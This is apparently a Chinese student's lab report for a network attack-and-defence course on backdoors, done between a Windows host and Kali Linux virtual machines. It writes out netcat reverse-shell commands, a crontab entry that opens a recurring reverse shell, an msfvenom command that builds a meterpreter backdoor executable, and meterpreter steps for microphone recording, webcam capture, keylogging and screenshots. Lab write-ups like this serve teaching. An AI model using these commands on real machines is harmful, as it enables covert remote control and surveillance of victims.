20165221 《网络对抗技术》EXP2：后门原理与实践

实验任务

• 任务一：使用netcat获取主机操作Shell，cron启动 (0.5分)

• 任务二：使用socat获取主机操作Shell, 任务计划启动 (0.5分)

• 任务三：使用MSF meterpreter（或其他软件）生成可执行文件，利用ncat或socat传送到主机并运行获取主机Shell(0.5分)

• 任务四：使用MSF meterpreter（或其他软件）生成获取目标主机音频、摄像头、击键记录等内容，并尝试提权 (2分)

具体实验操作

任务一：Windows下获得Linux Shell

• 在Windows下使用ipconfig查看本机IP
  
  

• 使用ncat.exe程序监听本机的5221端口：
  
  

• 在虚拟机中，使用nc指令的-e选项反向连接Windows主机的5221端口：
  
  

• 成功获得Kali的shell:
  
  

任务二：Linux下获得Windows Shell

• 在Kali环境中使用ifconfig查看IP：
  
  
• 使用nc指令监听5221端口：
  
  
• 在Windows下，使用ncat.exe程序的-e选项项反向连接Kali主机的5221端口:
  
  
• Kali下可以看到Windows的命令提示，可以输入Windows命令：
  
  
• 在windows下监听5221端口

任务三：使用nc传输数据

• 在Windows下监听5221端口：ncat.exe -l 5221

• kali下连接到Windows的5221端口

• 进行数据传输
  
  

• 用crontab -e指令编辑一条定时任务

• 在最后一行添加53 * * * * /bin/netcat 192.168.75.129 -e /bin/sh，意思是在每个小时的第53分钟反向连接Windows主机的5221端口：

• * * * *的意思
  
  

• 当时间到了以后，打开命令行，会发现已经获得了kali的shell,可以输入指令查看具体信息
  
  

任务五：使用socat获取主机操作Shell, 任务计划启动

• socat是ncat的增强版，它使用的格式是socat [options] <address> <address>，其中两个address是必选项，而options 是可选项。
  
  
  
  
  
  

使用MSF meterpreter生成可执行文件，利用ncat或socat传送到主机并运行获取主机Shell

• 输入指令，生成后门程序 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.75.129 LPORT=5221 -f exe > 20165221_backdoor.exe
  
  

• 通过nc指令将生成的后门程序送到windows主机上：
  
  

• 在kali中使用msfconsole指令进入msf控制台，启用监听模块，并进行相关的配置：

  1. use exploit/multi/handler（使用监听模块，设置payload）
  2. set payload windows/meterpreter/reverse_tcp
     
     （使用和生成后门程序时相同的payload）
     
     3.set LHOST 192.168.75.128
  3. set LPORT 5221

• 运行Windows下的后门程序：
  
  

• 此时Kali上已经获得了Windows主机的连接，并且得到了远程控制的shell：
  
  

使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等，并尝试提权

• 使用命令record_mic可以获得一段音频（持续1秒，路径自动生成）
  
  

• 使用命令webcam_snap可以用摄像头进行拍照
  
  

• 在kali中，keyscan_start开始记录击键记录，到win7的cmd中，任意输入，再在kali中输入keyscan_dump获取击键记录
  
  

• 使用命令screenshot对当前的win7进行屏幕截屏
  
  

实验中遇到的问题：

• 在win7虚拟机中无法打开后门程序
  
  

• 解决方式：关掉防火墙，并且重新检查指令，自己将host的ip的地址输入有误

• 输入msfconsole指令时，提示如下错误
  
  

• 解决方法：关闭虚拟机，扩充内存后再重复上操作

实践基础问题问答

（1）列举你能想到的一个后门进入到你系统中的方式？

比如我在下载一些软件时，到第三方源去下载，可能安装包中已经被设定了后门，一旦安装成功，后门就可以进入

（2）列举你知道的后门的启动的方式

win中是后门伴随着绑定的软件二一起启动

linux中是可以用corn启动

（3）Meterpreter有哪些给你映像深刻的功能？

实验中做到的截取屏幕和获取你的敲击键盘的内容，给我印象最深

（4）如何发现自己的系统有没有被安装后门

通过杀毒软件来查找

实验总结

这次的实验较第一次试验复杂一点，但是还是挺有趣的，特别是做到后面通过指令操控，获取截屏，键入等信息时，自己对后门的理解也有了加深，在日常的电脑使用中，也会更加小心。

20165221 《网络对抗技术》EXP2：后门原理与实践的更多相关文章

1. 2019-2020-2 20175226 王鹏雲 网络对抗技术 Exp2 后门原理与实践

   2019-2020-2 20175226 王鹏雲 网络对抗技术 Exp2 后门原理与实践 实验内容 使用netcat获取主机操作Shell,cron启动: 使用socat获取主机操作Shell, 任务 ...

2. 20155326刘美岑 《网络对抗》Exp2 后门原理与实践

   20155326刘美岑 <网络对抗>Exp2 后门原理与实践 实验内容 (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作Shell, 任务计划启 ...

3. 20155320《网络对抗》Exp2 后门原理与实践

   20155320<网络对抗>Exp2 后门原理与实践 [实验内容] (3.5分) (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作Shell, ...

4. 20155324《网络对抗》Exp2 后门原理与实践

   20155324<网络对抗>Exp2 后门原理与实践 20155324<网络对抗>Exp2 后门原理与实践 常用后门工具实践 Windows获得Linux Shell 在Win ...

5. 20155208徐子涵《网络对抗》Exp2 后门原理与实践

   20155208徐子涵<网络对抗>Exp2 后门原理与实践 基础问题回答 (1)例举你能想到的一个后门进入到你系统中的可能方式? 答:当我们在非官方网站上下载软件时,后门极有可能会进入我们 ...

6. 20145236《网络对抗》Exp2 后门原理与实践

   20145236<网络对抗>Exp2 后门原理与实践 目录: 一.基础问题回答 二.常用后门工具实践 2.1 Windows获得Linux Shell 2.2 Linux获得Windows ...

7. 20155202 张旭《网络对抗》Exp2 后门原理与实践

   20155202 张旭<网络对抗>Exp2 后门原理与实践 基础问题回答 例举你能想到的一个后门进入到你系统中的可能方式? 捆绑在软件中 注入在可执行文件里 注入在office文件的宏里面 ...

8. 20155218《网络对抗》Exp2 后门原理与实践

   20155218<网络对抗>Exp2 后门原理与实践 常用后门工具实践 1.Windows获得Linux Shell: 在Windows下,先使用ipconfig指令查看本机IP,使用nc ...

9. 20155227《网络对抗》Exp2 后门原理与实践

   20155227<网络对抗>Exp2 后门原理与实践 基础问题回答 (1)例举你能想到的一个后门进入到你系统中的可能方式? 在非官方网站下载软件时,后门很可能被捆绑在软件中. 攻击者利用欺 ...

10. 20155232《网络对抗》Exp2 后门原理与实践

    20155232<网络对抗>Exp2 后门原理与实践 问题回答 1.例举你能想到的一个后门进入到你系统中的可能方式? 通过网页上弹出来的软件自动安装 2.例举你知道的后门如何启动起来(wi ...

随机推荐

1. 基于SSM的租赁管理系统0&period;1&lowbar;20161225&lowbar;项目需求

   基于SSM的汽车租赁系统项目计划书 1.产品定位 本系统供提供租赁服务的企业内部使用,供企业员工进行线下操作. 2.需求分析 2.1 能为工作人员提供员工信息的管理功能,具有RBAC基于角色的权限管理 ...

2. （转）学习使用Jmeter做压力测试&lpar;一&rpar;--压力测试基本概念

   一.性能测试的概念 性能测试是通过自动化的测试工具模拟多种正常峰值及异常负载条件来对系统的各项性能指标进行测试.负载测试和压力测试都属于性能测试,两者可以结合进行. 通过负载测试,确定在各种工作负载下 ...

3. usb驱动开发8之配置描述符

   前面分析了usb的四大描述符之端点描述符,接口描述符(每一个接口对应一个功能,与之配备相应驱动),下面是看配置描述符还是看设备描述符呢??我们知道,设备大于配置,配置大于接口,接口可以有多种设置. 我 ...

4. 使用jqMobi开发app基础：Badge的使用

   显示效果: 红色的部分就是Badge,能够用来显示数量或者是其它的信息. 使用事实上非常easy,  $.ui.updateBadge("#" + id, res.Msg, &qu ...

5. springMVC&plus;spring&plus;mybatis整合过程中遇到的问题

   今天在配置SSM整合的过程中遇到了几个错误,折腾了好久,具体如下 1.java.lang.IllegalArgumentException: Mapped Statements collection ...

6. Docker-compose 多个Docker容器管理&colon;以MYSQL和Wordpress为例

   搬砖的陈大师版权所有,转载请注明:http://www.lenggirl.com/tool/docker-compose.html Docker-compose 多个Docker容器管理:以MYSQL ...

7. Docker Register安装与基本认证

   准备 基本事项 Docker环境 登录授权方式 镜像存放地址 HTTPS外网访问 启动Docker Registry 1. 基本事项 本篇涉及到的数据文件都放在/data目录下, 其中会有三个子目录 ...

8. Mysql第一周

   前言:好久不见,我又来写博客拉.上个月只写了几篇django-rest-framework的,而且还是根据官网的英文写的.干货不多,内心还是有点羞耻的…… 简单说下我11月去干嘛了.11月初美图给我发 ...

9. 一大波开发者福利来了，一份微软官方Github上发布的开源项目清单等你签收

   目录 微软Github开源项目入口 微软开源项目受欢迎程度排名 Visual Studio Code TypeScript RxJS .NET Core 基础类库 CNTK Microsoft cal ...

10. sed 修改文本

    修改文本是指将所匹配的文本行利用新文本替代,sed编辑命令的修改文本符号为 c\, [ sed]$ more input [ sed]$ more aa.sed #!/bin/sed -f //c\ ...